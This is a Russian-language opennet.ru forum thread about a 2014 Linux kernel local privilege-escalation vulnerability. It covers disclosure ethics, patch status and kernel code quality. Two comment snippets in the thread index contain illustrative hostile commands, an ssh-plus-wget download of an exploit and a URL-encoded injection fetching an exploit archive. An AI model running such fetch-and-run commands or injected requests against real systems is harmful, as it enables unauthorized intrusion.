forum.opennet.ru

"Я ядре Linux выявлена локальная уязвимость, позволяющая подн..."

Форум Разговоры, обсуждение новостей
Версия для распечатки	Пред. тема \| След. тема

Исходное сообщение

[ Отслеживать ]

Присылайте удачные настройки в раздел примеров файлов конфигурации на WIKI.opennet.ru.

. "В ядре Linux выявлена локальная уязвимость, позволяющая подн..."	–2 +/–
Сообщение от Аноним (-), 06-Июн-14, 19:16
Прозвучали различные мнение о том, что лучше. Любой софт "дырявый". Из этого следует, что лучше путь о них никто не знает. Полагаю это самый разумный компромисс. Нельзя устранить все ошибки и довести продукт до идеала. До нужного состояния и не более того. А всяким "кодокопателям" нужно по рукам бить чтобы другие не страдали из за их энтузиазма. И тем более сурово карать за публикацию в открытый доступ. Палка с двумя концами. Хотели как лучше, а вышло как всегда...
Ответить \| Правка \| Наверх \| Cообщить модератору

Оглавление

Я ядре Linux выявлена локальная уязвимость, позволяющая подн..., opennews, 06-Июн-14, 10:55 [смотреть все]

А эксплоит-то есть, чтобы проверить, работает ли оно Просто у меня из всей массы, emg81, 06-Июн-14, 11:35 (11) //
- Надо замутить , pavlinux, 06-Июн-14, 13:33 (25) //
  - Пля, работает, во срань , pavlinux, 07-Июн-14, 14:00 (100) //
    - Где скачать исходники exploit использующий эту уязвимость , KASRU, 25-Июн-14, 17:30 (118)
      - ты поменьше павлину верь вдобавок 8212 ему и сплойтов никаких не надо, с его, arisu, 25-Июн-14, 18:18 (119)
- А я из 16 000 зарегистрированных болезней, болел только поносом Видимо пора за, Аноним, 06-Июн-14, 13:38 (28) //
  - Мойте руки перед едой, чо , Аноним, 06-Июн-14, 13:59 (30)
  - Понос - это не болезнь, а следствие ее , Archnewbie, 06-Июн-14, 14:13 (35) //
    - ответная реакция организма, Аноним, 06-Июн-14, 16:32 (46)
    - Понос - состояние, которое может быть вызвано не только болезнью, бестолочи , клоун, 06-Июн-14, 16:37 (49)
      - А, так вот в чём Вы толк знаете , Michael Shigorin, 06-Июн-14, 17:03 (53)
        
        Включай мозги Нашёл на свалке просроченные продукты Приготовил, сразу съел Ду, клоун, 06-Июн-14, 17:38 (60)
        
        ну от слабоумия если,конечно, не жизнь заставила , nickfaces, 06-Июн-14, 21:41 (76)
        Дизбактериоз , SubGun, 06-Июн-14, 22:42 (79)
        Мда Простой вопрос ПОЧЕМУ просроченные продукты вызывают понос И вдогонку , Ivan, 06-Июн-14, 23:07 (81)
        Биологию ты чтоли не учил в своем дворце Тебе про бактерий не рассказывали Впр, Аноним, 07-Июн-14, 09:38 (96)
        
        ага Про экзо и эндотоксины почитай еще , чо, 07-Июн-14, 18:52 (105)
        
        Да, у него словесный off иногда даже троллинг модератором посетителя - доста, Аноним, 07-Июн-14, 09:33 (95)
        
        Вообще справедливости ради, баланс чуши флуда вбросов к конструктиву, хоть и со , Michael Shigorin, 07-Июн-14, 14:12 (102)
        
        Что-то пока не очень заметно , Аноним, 09-Июн-14, 13:47 (111)
Что-то меня ядро Linux начало разочаровывать своими уязвимостями Для Fedora 20 в, Аноним, 06-Июн-14, 11:37 (12) //
- Вас разочаровывает тот факт, что нашли дырку еще с времен 2 6 32 или тот факт чт, Khariton, 06-Июн-14, 13:45 (29) //
  - Разочаровывает, что ядро такое большое сложное немодульное и этого не изменить , Аноним, 06-Июн-14, 16:33 (47) //
    - Вы хоть раз в него вообще заглядывали , Michael Shigorin, 06-Июн-14, 16:51 (52)
      - Нет, а ты , Аноним, 06-Июн-14, 17:31 (56)
        
        Для чего тогда прикидываешься тупым попугаем , Аноним, 06-Июн-14, 21:07 (72)
        Да code --- linux-2 2 5 fs isofs inode c orig Tue Dec 29 21 40 35 1998 lin, Michael Shigorin, 06-Июн-14, 23:24 (82)
        
        чёрт, буратино был тупой сколько уж матом на это ругаюсь, а простая мысль взять, arisu, 07-Июн-14, 01:46 (86)
        
        Так туда ручку для noexec прикрутили где-то в 2 4, если не раньше А тогда прос, Michael Shigorin, 07-Июн-14, 14:16 (103)
      - Да, и был поражен количеством легаси-гoвна, про которое мне пришлось долго, очен, Аноним, 06-Июн-14, 17:52 (62)
        
        Пострадали только Вы , Deffic, 06-Июн-14, 20:48 (68)
        Оно и пилится в отдельных ветках по факту, а потом уже мерджится Вон у поттеринг, Аноним, 06-Июн-14, 21:48 (77)
    - Попробуй посмотреть как его разрабатывают чтоли, эксперт хренов Заодно узнай чт, Аноним, 07-Июн-14, 09:40 (97)
- Во второй половине двухтысячных в Firefox выявлялось больше уязвимостей, чем в I, Аноним, 06-Июн-14, 14:01 (31) //
  - Это ничего не означает А измеримое понятие качество кода само по себе нуждаетс, клоун, 06-Июн-14, 14:54 (38) //
    - ну для кого-то может и не существует http habrahabr ru post 220769 , none_first, 06-Июн-14, 17:47 (61)
    - Почему же Количество багов на тысячу строк - очень даже измеримая сущность с вп, Аноним, 07-Июн-14, 09:41 (98)
      - А мифическое качество кода не измеряется и не определимо чётко Попытка подмен, Andrey Mitrofanov, 07-Июн-14, 12:51 (99)
      - Не термине, а определении, но да Баг багу рознь , Michael Shigorin, 07-Июн-14, 14:05 (101)
Хорошо, больше рута для ондроидов А то когдаа безопасность ДЛЯ пользователя, эт, vitalif, 06-Июн-14, 11:46 (14) //
- Для пользователя без мозгов ЛЮБАЯ безопасность против , Сергей, 06-Июн-14, 16:36 (48)
- боюсь в андроиде нет фьютексов , mr propper 2, 06-Июн-14, 16:41 (50) //
  - Да кудаж они делись то Улетели на метле , Аноним, 06-Июн-14, 21:52 (78)
как хорошо, что у меня centos5 на серверах, Нанобот, 06-Июн-14, 11:50 (15) //
- уязвимость локальная, или у вас локалхосты , Аноним, 06-Июн-14, 12:10 (17) //
  - ssh user hostname com wget http somewhere com foo bar exploit exploit , pavlinux, 06-Июн-14, 13:28 (23) //
    - http 3A 2F 2Fremotehost example com 2F 3Fwget www hackers org 2Fexploit zip 26 2, Аноним, 06-Июн-14, 14:35 (36)
В генте уже поправили , Андрей, 06-Июн-14, 12:18 (18) //
- в дебе вчера и ссл и ядро приехало, Аноним, 06-Июн-14, 14:10 (33) //
  - Подтверждаю Даже для бекпортированной 3 14 - linux-image-3 14-0 bpo 1-amd64 amd, Аноним, 06-Июн-14, 16:30 (45)
Новость позитивная Если уязвимость не найдена, то это не значит, что её нет, бо, Sergey722, 06-Июн-14, 12:20 (19) //
- Совершенно верно Новость позитивная Баги были есть и будут всегда Главное что, lucentcode, 06-Июн-14, 12:35 (20) //
  - от 2010 годаДа, вовремя , Аноним, 06-Июн-14, 13:32 (24)
  - Больше багов, хороших и разных Извините за оффтоп , umbr, 06-Июн-14, 15:39 (41)
- Вообще-то найденная уязвимость -- это найденная уязвимость Её ещё надо разобра, Michael Shigorin, 06-Июн-14, 13:03 (21) //
  - Вы пропустили важный пункт - 3 наказать того кто пропустил уязвимость, потом то, Аноним, 06-Июн-14, 13:36 (27) //
    - типичный корпоративный путь в пропасть насмотрелся надо описывать в деталях к , Ytch, 06-Июн-14, 21:07 (71)
    - Людям свойственно ошибаться Наказывать человека за то что он человек Хм, удачи, Аноним, 07-Июн-14, 09:32 (94)
  - В альтах уже патч доступен А в прочем кому они нужны , Аноним, 06-Июн-14, 14:02 (32) //
    - Да, конечно доступен , boyarsh, 06-Июн-14, 15:51 (43)
И эти самые корпорации, не способные обезопасить ядро собираются улучшать разраб, Аноним, 06-Июн-14, 16:18 (44)
Прозвучали различные мнение о том, что лучше Любой софт дырявый Из этого сле , Аноним, 06-Июн-14, 19:16 (64) //
- Ты не думал что в твоем комментарии логическое противоречии Если все ошибки тру, Аноним, 06-Июн-14, 21:03 (69)
- Нет Нет Нет Бить палкой по рукам надо тем, кто зря возомнил себя разработчиком , Michael Shigorin, 06-Июн-14, 23:36 (84) //
  - Нет, Аноним, 07-Июн-14, 22:48 (106) //
    - Нет смысла повторять эхом, тем паче когда примеры известны , Michael Shigorin, 07-Июн-14, 23:28 (107)
      - Примеры в студию, кроме Альта разумеется , Аноним, 09-Июн-14, 01:11 (108)
        
        запросто TeX , arisu, 09-Июн-14, 05:22 (109)
        
        Ага, шикарный пример, которым пользуются целых два с половиной землемера И на э, Аноним, 14-Июн-14, 21:56 (113)
        
        ты ошибся сайтом, винфак не здесь , arisu, 14-Июн-14, 21:59 (114)
        
        Слив засчитан, сиди на солнышке грейся , Аноним, 15-Июн-14, 02:08 (115)
        
        извини, я не знал, что ты 8212 сливной бачок думал, просто виндоюзер заблуди, arisu, 15-Июн-14, 02:10 (116)
        
        Альт как раз в таком качестве не годится как и любая известная мне ОС , а отдел, Michael Shigorin, 10-Июн-14, 01:27 (112)
- DJB делом доказал в qmail и djbdns что это не так Неверный вывод из неверных пре, Аноним, 07-Июн-14, 09:23 (93) //
  - Отнюдь И вообще-то пример с DJB и другими сторонниками подхода proactive secur, Michael Shigorin, 07-Июн-14, 14:19 (104) //
    - Да, тут есть в новой новости иллюстрация - там где про секурный L4 Если ядро ни, Аноним, 25-Июн-14, 19:27 (121)
Что-то они зачастили в последнее время , AX, 06-Июн-14, 21:06 (70) //
- Когда действуют в опережение, в этом нет ничего плохого Хуже, когда все шито-кр, Мистер Икс, 06-Июн-14, 21:17 (74)
После установки свежего обновления ядра в Ubuntu перестали запускаться куча прог, Аноним, 09-Июн-14, 10:14 (110)
Где скачать исходники exploit использующий эту уязвимость , KASRU, 25-Июн-14, 17:28 (117)

Форумы | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру